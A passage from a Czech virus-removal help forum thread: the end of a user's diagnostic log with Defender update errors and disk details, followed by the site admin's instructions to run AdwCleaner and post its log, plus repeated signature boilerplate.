Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0360000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antispywarový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
==================== Memory info ===========================
BIOS: American Megatrends Inc. 0308 07/10/2007
Motherboard: ASUSTeK Computer INC. M2N-MX SE
Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4200+
Percentage of memory in use: 38%
Total physical RAM: 3071.36 MB
Available physical RAM: 1887.16 MB
Total Virtual: 6271.36 MB
Available Virtual: 5348.71 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.32 GB) (Free:298.64 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (KINGSTON) (Removable) (Total:14.44 GB) (Free:13.07 GB) FAT32
\\?\Volume{44cc5245-0000-0000-0000-a05474000000}\ () (Fixed) (Total:0.44 GB) (Free:0.1 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 44CC5245)
Partition 1: (Active) - (Size=465.3 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=449 MB) - (Type=27)
==========================================================
Disk: 1 (Size: 14.5 GB) (Disk ID: 0D702AAC)
Partition 1: (Not Active) - (Size=14.5 GB) - (Type=0B)
==================== End of Addition.txt =======================
-
Rudy
- Site Admin
- Příspěvky: 119418
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: prosím o kontrolu logu rsit
OK. Teď spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/
ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Přispějete na provoz fóra?